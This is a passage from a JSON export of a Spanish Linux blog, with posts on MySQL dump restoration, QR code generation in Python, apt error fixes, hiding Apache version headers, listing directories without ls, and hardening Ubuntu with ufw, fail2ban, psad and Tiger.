style=\"color:#66d9ef\"\u003e\\\\\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ex+\u003cspan style=\"color:#66d9ef\"\u003e\\frac\u003c/span\u003e{b}{2a} \u0026amp;= \u003cspan style=\"color:#66d9ef\"\u003e\\frac\u003c/span\u003e{\u003cspan style=\"color:#66d9ef\"\u003e\\pm\\sqrt\u003c/span\u003e{b^2-4ac}}{2a} \u003cspan style=\"color:#66d9ef\"\u003e\\\\\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ex \u0026amp;= \u003cspan style=\"color:#66d9ef\"\u003e\\frac\u003c/span\u003e{-b\u003cspan style=\"color:#66d9ef\"\u003e\\pm\\sqrt\u003c/span\u003e{b^2-4ac}}{2a}\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003e\\end\u003c/span\u003e{align*}\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eEl resultado será parecido a éste:\u003c/p\u003e\n\u003cdiv\u003e\n$$\n\\begin{align*}\nax^2+bx+c \u0026= 0 \\\\\nx^2+\\frac{b}{a}x+\\frac{c}{a} \u0026= 0 \\\\\nx^2+\\frac{b}{a}x \u0026= -\\frac{c}{a} \\\\\nx^2+\\frac{b}{a}x+\\frac{b^2}{4a^2} \u0026= \\frac{b^2}{4a^2} - \\frac{c}{a} \\\\\n(x+\\frac{b}{2a})^2 \u0026= \\frac{b^2}{4a^2} - \\frac{4ac}{4a^2} \\\\\nx+\\frac{b}{2a} \u0026= \\pm\\sqrt{\\frac{b^2-4ac}{4a^2}} \\\\\nx+\\frac{b}{2a} \u0026= \\frac{\\pm\\sqrt{b^2-4ac}}{2a} \\\\\nx \u0026= \\frac{-b\\pm\\sqrt{b^2-4ac}}{2a}\n\\end{align*}\n$$\n\u003c/div\u003e","title":"LaTeX en Wordpress"},{"content":"Para realizar un volcado de datos, podemos ejecutar:\n$ mysqldump -uuser -p --all-databases --host localhost \u0026gt; mysql.sql Fuente: luauf.com\nPara importar este volcado, existe la herramienta mysqlimport:\n$ mysqlimport -uuser -hhost -p --local dbname mysql.sql Sin embargo, no me acaba de ir bien, ya que me devuelve este error:\nmysqlimport: Error: 1146, Table \u0026#39;dbname.mysql\u0026#39; doesn\u0026#39;t exist, when using table: mysql Una forma de conseguir restaurar el volcado de datos es desde el cliente de mysql:\n$ mysql -uuser -p dbname mysql\u0026gt; source mysql.sql; mysql\u0026gt; exit; Otra forma:\n$ mysql -uuser -p dbname \u0026lt; mysql.sql ","permalink":"http://karpoke.ignaciocano.com/2011/03/27/importar-un-volcado-de-datos-en-mysql/","summary":"\u003cp\u003ePara realizar un volcado de datos, podemos ejecutar:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ mysqldump -uuser -p --all-databases --host localhost \u0026gt; mysql.sql\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e\u003cimg alt=\"MySQL Dump\" loading=\"lazy\" src=\"/images/mysqldump.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eFuente: \u003ca href=\"http://luauf.com/2008/05/17/mysql-shell-script-backup/\"\u003eluauf.com\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003ePara importar este volcado, existe la herramienta \u003ccode\u003emysqlimport\u003c/code\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ mysqlimport -uuser -hhost -p --local dbname mysql.sql\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eSin embargo, no me acaba de ir bien, ya que me devuelve este error:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003emysqlimport: Error: 1146, Table \u0026#39;dbname.mysql\u0026#39; doesn\u0026#39;t exist, when using table: mysql\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eUna forma de conseguir \u003ca href=\"http://forums.mysql.com/read.php?10,269126,269264#msg-269264\"\u003erestaurar el volcado de datos\u003c/a\u003e es desde el\ncliente de \u003ccode\u003emysql\u003c/code\u003e:\u003c/p\u003e","title":"Importar un volcado de datos en MySQL"},{"content":"Un código QR (Quick Response Barcode) permite almacenar información en un código de barras de dos dimensiones.\nHay bastantes servicios en la web que nos permiten crear nuestros propios códigos, por ejemplo el de Google, que podemos emplear desde la línea de comandos:\n$ curl http://chart.apis.google.com/chart?chs=150x150\u0026amp;cht=qr\u0026amp;chld=H|0\u0026amp;chl=texto -o qr.png Un pequeño alias para tenerlo siempre a mano:\n$ alias qrurl=\u0026#39;qrurl() { curl http://chart.apis.google.com/chart?chs=150x150\u0026amp;cht=qr\u0026amp;chld=H|0\u0026amp;chl=${@// /%20} -o qr.$(date +%Y%m%d%H%M%S).png; }; qrurl\u0026#39; $ qrurl una ranita iba caminando Esto creará un fichero con un nombre parecido a qr.20110325161706.png.\nHay un paquete que nos permite hacer esto desde la línea de comandos, es qrencode:\n$ qrencode qrencode version 3.1.1 Copyright (C) 2006, 2007, 2008, 2009 Kentaro Fukuchi Usage: qrencode [OPTION]... [STRING] Encode input data in a QR Code and save as a PNG image. -h display this message. --help display the usage of long options. -o FILENAME write PNG image to FILENAME. If \u0026#39;-\u0026#39; is specified, the result will be output to standard output. If -S is given, structured symbols are written to FILENAME-01.png, FILENAME-02.png, ...; if specified, remove a trailing \u0026#39;.png\u0026#39; from FILENAME. -s NUMBER specify the size of dot (pixel). (default=3) -l {LMQH} specify error collectin level from L (lowest) to H (highest). (default=L) -v NUMBER specify the version of the symbol. (default=auto) -m NUMBER specify the width of margin. (default=4) -S make structured symbols. Version must be specified. -k assume that the input text contains kanji (shift-jis). -c encode lower-case alphabet characters in 8-bit mode. (default) -i ignore case distinctions and use only upper-case characters. -8 encode entire data in 8-bit mode. -k, -c and -i will be ignored. -V display the version number and copyrights of the qrencode. [STRING] input data. If it is not specified, data will be taken from standard input. También hay aplicaciones para el móvil, como el Kaywa Reader, pero ahora vamos a ver cómo podemos crear y leer un código QR desde Python.\npyqrcode pyqrcode es una extensión para poder codificar y decodificar códigos QR en Python. Para la codificación se ha basado en la librería libqrencode de Fukuchi Kentaro, y para la decodificación utiliza la librería de qrcode de Yusuke Yanbe.\nPara instalarlo se necesita:\n$ sudo aptitude install jcc openjdk-6-jdk openjdk-6-jre python-imaging python-setuptools python-dev En su página pone el Java de Sun, pero a mi también me ha ido bien con el OpenJDK.\nUna vez que nos hayamos descargado el código, toca compilarlo:\n$ tar xvzf pyqrcode-0.2.1.tar.gz $ cd pyqrcode-0.2.1 $ make Si tenemos una versión de Python superior a la 2.6, nos aparecerá el siguiente error:\npython -m jcc --jar qrcode/qrcode.jar --build /usr/bin/python: jcc is a package and cannot be directly executed make: *** [lib] Error 1 La solución pasa por cambiar -m jcc por -m jcc.__main__ en el Makefile. Quedaría así:\n#GENERATE=python -m jcc --jar $(LIBFILE) GENERATE=python -m jcc.__main__ --jar $(LIBFILE) Ahora ya podemos instalarlo:\n$ sudo make install También podemos crear un binario a partir de la extensión:\n$ sudo make egg e instalarlo:\n$ cd dist $ sudo easy_install qrcode-0.2.1-py2.6-linux-i686.egg Para comprobar que está correctamente instalado, podemos hacer la siguiente prueba:\n$ ipython \u0026gt;\u0026gt;\u0026gt; import qrcode En Ubuntu Maverick Meerkat es posible que nos salga el siguiente error:\nIn [1]: import qrcode --------------------------------------------------------------------------- AttributeError Traceback (most recent call last) /home/karpoke/ in () /usr/local/lib/python2.6/dist-packages/qrcode-0.2.1-py2.6-linux-i686.egg/qrcode/__init__.py in () 19 pass 20 ---\u0026gt; 21 _qrcode._setExceptionTypes(JavaError, InvalidArgsError) 22 23 VERSION = \u0026#34;0.2.1\u0026#34; AttributeError: \u0026#39;module\u0026#39; object has no attribute \u0026#39;_setExceptionTypes\u0026#39; Después de ver el código que da este error, una posible solución es comentar la línea del fichero qrcode/__init__.py que da el error.\n# _qrcode._setExceptionTypes(JavaError, InvalidArgsError) Volvemos a generar el huevo y lo volvemos a instalar:\n$ sudo make egg $ sudo easy_install qrcode-0.2.1-py2.6-linux-i686.egg Este python egg se puede descargar desde el directorio público.\nYa podemos hacer una prueba para crear un código QR:\nimport sys, qrcode e = qrcode.Encoder() image = e.encode(\u0026#39;ando con la mirada fija en el cielo\u0026#39;, version=3, mode=e.mode.BINARY, eclevel=e.eclevel.H) image.save(\u0026#39;out.png\u0026#39;) Para decodificar:\nimport sys, qrcode d = qrcode.Decoder() print d.result if d.decode(\u0026#34;out.png\u0026#34;) else \u0026#34;error\u0026#34; En el terminal Para hacer aún más cómoda la decodificación desde el terminal, vamos a crear un alias, qrdecode:\n# $1 filename alias qrdecode=\u0026#39;fqrdecode() { python -c \u0026#34;import qrcode;d=qrcode.Decoder();print d.result if d.decode(\u0026#39;\\\u0026#39;\u0026#39;$1\u0026#39;\\\u0026#39;\u0026#39;) else \u0026#39;\\\u0026#39;\u0026#39;Error\u0026#39;\\\u0026#39;\u0026#39;\u0026#34;; }; fqrdecode\u0026#39; Para crear un QR desde la línea de comandos ya tenemos el paquete qrencode comentado anteriormente.\n$ qrencode \u0026#34;texto a poner en el código qr\u0026#34; -o out.png $ qrdecode out.png texto a poner en el código qr Usando la webcam La biblioteca libdecodeqr contiene un lector de códigos QR usando la webcam. Para utilizarlo, ejecutamos:\n$ libdecodeqr-webcam ","permalink":"http://karpoke.ignaciocano.com/2011/03/27/creando-y-leyendo-codigos-qr-desde-python/","summary":"\u003cp\u003eUn código QR (Quick Response Barcode) permite almacenar información en\nun código de barras de dos dimensiones.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"cc.qr.code.capacity`\" loading=\"lazy\" src=\"/images/cc.qr_.code_.capacity-300x166.jpg\"\u003e\u003c/p\u003e\n\u003cp\u003eHay bastantes servicios en la web que nos permiten crear nuestros\npropios códigos, por ejemplo \u003ca href=\"http://code.google.com/apis/chart/infographics/docs/qr_codes.html\"\u003eel de Google\u003c/a\u003e, que podemos emplear desde\nla línea de comandos:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ curl http://chart.apis.google.com/chart?chs=150x150\u0026amp;cht=qr\u0026amp;chld=H|0\u0026amp;chl=texto -o qr.png\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e\u003cimg alt=\"QR Code Python\" loading=\"lazy\" src=\"/images/qrcode-python.png\"\u003e\u003c/p\u003e\n\u003cp\u003eUn pequeño alias para tenerlo siempre a mano:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ alias qrurl=\u0026#39;qrurl() { curl http://chart.apis.google.com/chart?chs=150x150\u0026amp;cht=qr\u0026amp;chld=H|0\u0026amp;chl=${@// /%20} -o qr.$(date +%Y%m%d%H%M%S).png; }; qrurl\u0026#39;\n$ qrurl una ranita iba caminando\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEsto creará un fichero con un nombre parecido a \u003ccode\u003eqr.20110325161706.png\u003c/code\u003e.\u003c/p\u003e","title":"Creando y leyendo códigos QR desde Python"},{"content":"Tras realizar una actualización rutinaria, aptitude update, me encuentro con el siguiente error:\nE: Encountered a section with no Package: header E: Problem with MergeList /var/lib/apt/lists/ftp.caliu.cat_debian_dists_testing_main_binary-i386_Packages E: No se pudieron analizar o abrir las listas de paquetes o el archivo de estado. E: No se pudo reconstruir el almacén de paquetes La solución para resolver el conflicto, que parece ser debido a una corrupción en las listas, pasa por borrarlas, y ya podremos actualizar normalmente:\n$ sudo rm -fr /var/lib/apt/lists/* ","permalink":"http://karpoke.ignaciocano.com/2011/03/17/solucionado-el-error-e-problem-with-mergelist-al-actualizar-debian/","summary":"\u003cp\u003eTras realizar una actualización rutinaria, \u003ccode\u003eaptitude update\u003c/code\u003e, me\nencuentro con el siguiente error:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eE: Encountered a section with no Package: header\nE: Problem with MergeList /var/lib/apt/lists/ftp.caliu.cat_debian_dists_testing_main_binary-i386_Packages\nE: No se pudieron analizar o abrir las listas de paquetes o el archivo de estado.\nE: No se pudo reconstruir el almacén de paquetes\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e\u003cimg alt=\"Deb packages\" loading=\"lazy\" src=\"/images/icono-paquete-deb.png\"\u003e\u003c/p\u003e\n\u003cp\u003eLa \u003ca href=\"http://ubuntuforums.org/archive/index.php/t-863742.html\"\u003esolución\u003c/a\u003e para resolver el conflicto, que parece ser debido a una\ncorrupción en las listas, pasa por borrarlas, y ya podremos actualizar\nnormalmente:\u003c/p\u003e","title":"Solucionado el error \"E: Problem with MergeList\" al actualizar Debian"},{"content":"Inception en C:\n$ git clone https://github.com/karthick18/inception.git ","permalink":"http://karpoke.ignaciocano.com/2011/03/14/inception/","summary":"\u003cp\u003e\u003cem\u003e\u003ca href=\"http://github.com/karthick18/inception\"\u003eInception\u003c/a\u003e\u003c/em\u003e en C:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ git clone https://github.com/karthick18/inception.git\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e\u003cimg alt=\"inception\" loading=\"lazy\" src=\"/images/inception-300x203.png\"\u003e\u003c/p\u003e","title":"inception"},{"content":"Tras instalar Apache, tanto en las cabeceras de la página:\n$ curl -I localhost HTTP/1.1 200 OK Date: Sat, 12 Mar 2011 11:55:12 GMT Server: Apache/2.2.16 (Ubuntu) Last-Modified: Sat, 02 Jan 2010 00:00:23 GMT ETag: \u0026#34;aa34-b1-47c232cbc0633\u0026#34; Accept-Ranges: bytes Content-Length: 177 Vary: Accept-Encoding Content-Type: text/html como en las páginas de error:\n\u0026lt;!DOCTYPE HTML PUBLIC \u0026#34;-//IETF//DTD HTML 2.0//EN\u0026#34;\u0026gt; 404 Not Found Not Found The requested URL /terminus was not found on this server. Apache/2.2.16 (Ubuntu) Server at localhost Port 80 se muestra la versión de Apache, y de PHP si también lo hemos instalado. Ocultar este tipo de información se conoce como seguridad por oscuridad, por lo que no es realmente seguridad, pero puede ayudar a evitar ataques automatizados.\nModificaremos las directivas ServerTokens, que por defecto es OS, y ServerSignature, que por defecto es On. En el fichero /etc/apache2/cond.d/security modificamos:\nServerTokens ProductOnly ServerSignature Off La directiva ServerTokens acepta varias opciones:\nServerTokens Prod[uctOnly] Server sends (e.g.): Server: Apache ServerTokens Major Server sends (e.g.): Server: Apache/2 ServerTokens Minor Server sends (e.g.): Server: Apache/2.0 ServerTokens Min[imal] Server sends (e.g.): Server: Apache/2.0.41 ServerTokens OS Server sends (e.g.): Server: Apache/2.0.41 (Unix) ServerTokens Full (or not specified) Server sends (e.g.): Server: Apache/2.0.41 (Unix) PHP/4.2.2 MyMod/1.2 Esta directiva también controla la información que proporciona la directiva ServerSignature:\nSyntax: ServerSignature On|Off|EMail Para ocultar la cabecera que muestra si tenemos instalado PHP y su versión editamos el fichero /etc/php5/apache2/php.ini y mofidificamos la variable:\nexpose_php = Off Sin embargo, después de todo esto, las cabeceras siguen mostrando que es un Apache:\n$ curl -I localhost HTTP/1.1 200 OK Date: Sat, 12 Mar 2011 12:20:39 GMT Server: Apache Last-Modified: Sat, 02 Jan 2010 00:00:23 GMT ETag: \u0026#34;aa34-b1-47c232cbc0633\u0026#34; Accept-Ranges: bytes Content-Length: 177 Vary: Accept-Encoding Content-Type: text/html Una opción para evitar que aparezca es compilar Apache. En el archivo includes/ap_release.h, deberíamos cambiar:\n#define AP_SERVER_BASEVENDOR \u0026#34;Apache Software Foundation\u0026#34; #define AP_SERVER_BASEPROJECT \u0026#34;Apache HTTP Server\u0026#34; #define AP_SERVER_BASEPRODUCT \u0026#34;Apache\u0026#34; Actualizado el 14 de abril de 2012 Otras opciones para modificar la cabecera ServerTokens o evitar que aparezca, sin tener que compilar, son:\n» utilizar el módulo mod_security » utilizar Varnish\n","permalink":"http://karpoke.ignaciocano.com/2011/03/12/ocultando-cabeceras/","summary":"\u003cp\u003eTras instalar Apache, tanto en las \u003ca href=\"/2011/02/28/cabeceras-http-personalizadas-en-apache2/\"\u003ecabeceras de la página\u003c/a\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ curl -I localhost\nHTTP/1.1 200 OK\nDate: Sat, 12 Mar 2011 11:55:12 GMT\nServer: Apache/2.2.16 (Ubuntu)\nLast-Modified: Sat, 02 Jan 2010 00:00:23 GMT\nETag: \u0026#34;aa34-b1-47c232cbc0633\u0026#34;\nAccept-Ranges: bytes\nContent-Length: 177\nVary: Accept-Encoding\nContent-Type: text/html\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003ecomo en las páginas de error:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e\u0026lt;!DOCTYPE HTML PUBLIC \u0026#34;-//IETF//DTD HTML 2.0//EN\u0026#34;\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e404 Not Found\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eNot Found\nThe requested URL /terminus was not found on this server.\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eApache/2.2.16 (Ubuntu) Server at localhost Port 80\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003ese muestra la versión de Apache, y de PHP si también lo hemos instalado.\nOcultar este tipo de información se conoce como seguridad por oscuridad,\npor lo que no es realmente seguridad, pero puede ayudar a evitar ataques\nautomatizados.\u003c/p\u003e","title":"Ocultando cabeceras"},{"content":"En bash:\n$ for i in *; do echo $i; done Fuente: nfosolutions.com\nEn C:\n/* * * Esempio che scansiona una cartella stampando a video i file in essa * contenuti. */ #include #include #include #include int main(int argc, char *argv[]) { DIR *dir; struct dirent *drent; if(argc \u0026lt; 2) { fprintf(stderr, \u0026#34;%s \\n\u0026#34;, argv[0]); return EXIT_FAILURE; } if((dir = opendir(argv[1])) == NULL) { fprintf(stderr, \u0026#34;Errore opendir()\\n\u0026#34;); return EXIT_FAILURE; } while((drent = readdir(dir)) != NULL) { fprintf(stdout, \u0026#34;--\u0026gt; %s\\n\u0026#34;, drent-\u0026gt;d_name); } if(closedir(dir) \u0026lt; 0) { fprintf(stderr, \u0026#34;Errore closedir()\\n\u0026#34;); return EXIT_FAILURE; } } En Python:\nimport os def ls(d): if os.path.isdir(d): for f in os.listdir(d): print \u0026#34;%s%s\u0026#34; % (f, \u0026#34;/\u0026#34; if os.path.isdir(f) else \u0026#34;\u0026#34;) En Python utilizando un generador que devuelve un resultado cada vez:\nimport subprocess def listdirx(dirname=\u0026#39;.\u0026#39;, cmd=\u0026#39;ls\u0026#39;): proc = subprocess.Popen([cmd, dirname], stdout=subprocess.PIPE) filename = proc.stdout.readline() while filename != \u0026#39;\u0026#39;: yield filename.rstrip(\u0026#39;\\n\u0026#39;) filename = proc.stdout.readline() proc.communicate() Una alternativa a listdir usando ctypes y opendir, readdir:\n#!/usr/bin/python \u0026#34;\u0026#34;\u0026#34; An equivalent os.listdir but as a generator using ctypes \u0026#34;\u0026#34;\u0026#34; from ctypes import CDLL, c_char_p, c_int, c_long, c_ushort, c_byte, c_char, Structure, POINTER from ctypes.util import find_library class c_dir(Structure): \u0026#34;\u0026#34;\u0026#34;Opaque type for directory entries, corresponds to struct DIR\u0026#34;\u0026#34;\u0026#34; pass class c_dirent(Structure): \u0026#34;\u0026#34;\u0026#34;Directory entry\u0026#34;\u0026#34;\u0026#34; # FIXME not sure these are the exactly correct types! _fields_ = ( (\u0026#39;d_ino\u0026#39;, c_long), # inode number (\u0026#39;d_off\u0026#39;, c_long), # offset to the next dirent (\u0026#39;d_reclen\u0026#39;, c_ushort), # length of this record (\u0026#39;d_type\u0026#39;, c_byte), # type of file; not supported by all file system types (\u0026#39;d_name\u0026#39;, c_char * 4096) # filename ) c_dirent_p = POINTER(c_dirent) c_lib = CDLL(find_library(\u0026#34;c\u0026#34;)) opendir = c_lib.opendir opendir.argtypes = [c_char_p] opendir.restype = c_dir_p # FIXME Should probably use readdir_r here readdir = c_lib.readdir readdir.argtypes = [c_dir_p] readdir.restype = c_dirent_p closedir = c_lib.closedir closedir.argtypes = [c_dir_p] closedir.restype = c_int def listdir(path): \u0026#34;\u0026#34;\u0026#34; A generator to return the names of files in the directory passed in \u0026#34;\u0026#34;\u0026#34; dir_p = opendir(\u0026#34;.\u0026#34;) try: while True: p = readdir(dir_p) if not p: break name = p.contents.d_name if name not in (\u0026#34;.\u0026#34;, \u0026#34;..\u0026#34;): yield name finally: closedir(dir_p) if __name__ == \u0026#34;__main__\u0026#34;: for name in listdir(\u0026#34;.\u0026#34;): print name ","permalink":"http://karpoke.ignaciocano.com/2011/03/12/ls-sin-ls/","summary":"\u003cp\u003eEn bash:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ for i in *; do echo $i; done\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e\u003cimg alt=\"ls\" loading=\"lazy\" src=\"/images/ls-300x232.jpg\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eFuente: \u003ca href=\"http://nfosolutions.com/\"\u003enfosolutions.com\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eEn \u003ca href=\"http://snippets.dzone.com/posts/show/2735\"\u003eC\u003c/a\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e/*\n *\n * Esempio che scansiona una cartella stampando a video i file in essa\n * contenuti.\n */\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e#include\n#include\n#include\n#include\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eint main(int argc, char *argv[])\n{\n    DIR *dir;\n    struct dirent *drent;\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e    if(argc \u0026lt; 2)\n    {\n        fprintf(stderr, \u0026#34;%s \\n\u0026#34;, argv[0]);\n        return EXIT_FAILURE;\n    }\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e    if((dir = opendir(argv[1])) == NULL)\n    {\n        fprintf(stderr, \u0026#34;Errore opendir()\\n\u0026#34;);\n        return EXIT_FAILURE;\n    }\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e    while((drent = readdir(dir)) != NULL)\n    {\n        fprintf(stdout, \u0026#34;--\u0026gt; %s\\n\u0026#34;, drent-\u0026gt;d_name);\n    }\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e    if(closedir(dir) \u0026lt; 0)\n    {\n        fprintf(stderr, \u0026#34;Errore closedir()\\n\u0026#34;);\n        return EXIT_FAILURE;\n    }\n}\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEn Python:\u003c/p\u003e","title":"ls sin ls"},{"content":"Cuando ejecutamos sudo por primera vez nos dice:\nWe trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. Trust\u0026hellip; my ass:\nFuente: xkcd.com\nFuente: leprosys.info\nFuente: leprosys.info\nFuente: genbeta.com\n","permalink":"http://karpoke.ignaciocano.com/2011/03/07/with-great-power-comes-great-responsibility/","summary":"\u003cp\u003eCuando ejecutamos \u003ccode\u003esudo\u003c/code\u003e por primera vez nos dice:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n#1) Respect the privacy of others.\n#2) Think before you type.\n#3) With great power comes great responsibility.\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eTrust\u0026hellip; \u003cem\u003emy ass\u003c/em\u003e:\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Sandwich\" loading=\"lazy\" src=\"/images/sandwich-300x249.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eFuente: \u003ca href=\"http://xkcd.com/149/\"\u003exkcd.com\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"sudo rm\" loading=\"lazy\" src=\"/images/sudorm.jpg\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eFuente: \u003ca href=\"http://www.leprosys.info/2008/08/no-ejecutes-sudo-rm-rf.html\"\u003eleprosys.info\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"whoops\" loading=\"lazy\" src=\"/images/whoops-300x272.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eFuente: \u003ca href=\"http://www.leprosys.info/2008/08/no-ejecutes-sudo-rm-rf.html\"\u003eleprosys.info\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"sudo-rm\" loading=\"lazy\" src=\"/images/sudo-rm-300x193.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eFuente: \u003ca href=\"http://www.genbeta.com/linux/la-terminal-de-linux-no-muerde-ii-trucos-mas-avanzados\"\u003egenbeta.com\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e","title":"With great power comes great responsibility"},{"content":"Un artículo para tener en cuenta algunas de las acciones que podemos llevar a cabo para securizar Ubuntu Maverick Meerkat. Algunos programas para facilitar la tarea de controlar los intentos de acceso al sistema:\nufw ufw es una forma sencilla de manejar un cortafuegos. Nada más instalarlo, lo habilitamos:\n$ sudo ufw enable Damos de alta los servicios^1^ que queremos que estén disponibles:\n$ sudo ufw allow http $ sudo ufw allow https $ sudo ufw allow 1234 Si queremos deshacer alguna de estas acciones, por ejemplo, eliminar la regla para el puerto 1234:\n$ sudo ufw delete 1234 Comprobamos el estado:\n$ sudo ufw status Estado: activo Hasta AcciónDesde ----- ------------------------ 80 ALLOW Anywhere 443 ALLOW Anywhere 1234 ALLOW Anywhere` fail2ban fail2ban busca intentos de acceso por SSH fallidos en /var/log/auth.log y bloquea las IPs de forma temporal. Podemos poner que se permitan hasta 3 intentos y si se falla se banea la IP durante, por ejemplo, 10 minutos. En el archivo /etc/fail2ban/jail.conf, además de poder poner un correo electrónico al cual nos lleguen los avisos, está la configuración para cada servicio que queramos controlar. Por ejemplo:\n[ssh] enabled = true port = 1234 filter = sshd logpath = /var/log/auth.log maxretry = 3 [apache] enabled = true port = http,https filter = apache-auth logpath = /var/log/apache*/*error.log maxretry = 3 En el fichero también vienen configuración para Apache, varios servidores de FTP, de correo y DNS.\nPara controlar el estado ejecutamos el cliente, por ejemplo:\n$ sudo fail2ban-client status Status |- Number of jail: 2 `- Jail list: apache, ssh $ sudo fail2ban-client status ssh Status for the jail: ssh |- filter | |- File list: /var/log/auth.log | |- Currently failed: 0 | `- Total failed: 3 `- action |- Currently banned: 0 | `- IP list: `- Total banned: 0 denyhosts denyhosts es parecido a fail2ban. Comprueba los intentos de acceso por SSH fallidos en /var/log/auth.log y añade las IPs al fichero /etc/hosts.deny.\npsad psad monitoriza los logs del iptables para detectar intentos de intrusión y tráfico sospechos. Se pueden configurar incontables parámetros en /etc/psad/psad.conf. Para comprobar el estado ejecutamos:\n$ sudo psad -S [+] psadwatchd (pid: 18853) %CPU: 0.0 %MEM: 0.0 Running since: Mon Mar 7 19:34:09 2011 [+] psad (pid: 18851) %CPU: 0.0 %MEM: 0.4 Running since: Mon Mar 7 19:34:09 2011 Command line arguments: [none specified] Alert email address(es): karpoke@localhost [+] Version: psad v2.1.5 [+] Top 50 signature matches: [NONE] [+] Top 25 attackers: [NONE] [+] Top 20 scanned ports: [NONE] [+] iptables log prefix counters: [NONE] Total packet counters: tcp: 0, udp: 0, icmp: 0 [+] IP Status Detail: [NONE] Total scan sources: 0 Total scan destinations: 0 [+] These results are available in: /var/log/psad/status.out Tiger Tiger es una herramienta de detección de intrusiones. Para ejecutarlo (Ojo! el análisis es bastante intenso en términos de CPU):\n$ sudo tiger Configuring... Will try to check using config for \u0026#39;i686\u0026#39; running Linux 2.6.32-28-generic... --CONFIG-- [con005c] Using configuration files for Linux 2.6.32-28-generic. Using configuration files for generic Linux 2. Tiger security scripts *** 3.2.2, 2007.08.28.00.00 *__ 20:38\u0026gt; Beginning security report for terminus. 20:38\u0026gt; Starting file systems scans in background... 20:38\u0026gt; Checking password files... 20:38\u0026gt; Checking group files... 20:38\u0026gt; Checking user accounts... 20:40\u0026gt; Checking .rhosts files... 20:40\u0026gt; Checking .netrc files... 20:40\u0026gt; Checking ttytab, securetty, and login configuration files... 20:40\u0026gt; Checking PATH settings... 20:40\u0026gt; Checking anonymous ftp setup... 20:40\u0026gt; Checking mail aliases... 20:40\u0026gt; Checking cron entries... 20:40\u0026gt; Checking \u0026#39;inetd\u0026#39; configuration... 20:40\u0026gt; Checking \u0026#39;tcpd\u0026#39; configuration... 20:40\u0026gt; Checking \u0026#39;services\u0026#39; configuration... 20:40\u0026gt; Checking NFS export entries... 20:40\u0026gt; Checking permissions and ownership of system files... --CONFIG-- [con010c] Filesystem \u0026#39;devtmpfs\u0026#39; used by \u0026#39;none\u0026#39; is not recognised as a valid filesystem 20:40\u0026gt; Checking for indications of break-in... --CONFIG-- [con010c] Filesystem \u0026#39;devtmpfs\u0026#39; used by \u0026#39;none\u0026#39; is not recognised as a valid filesystem 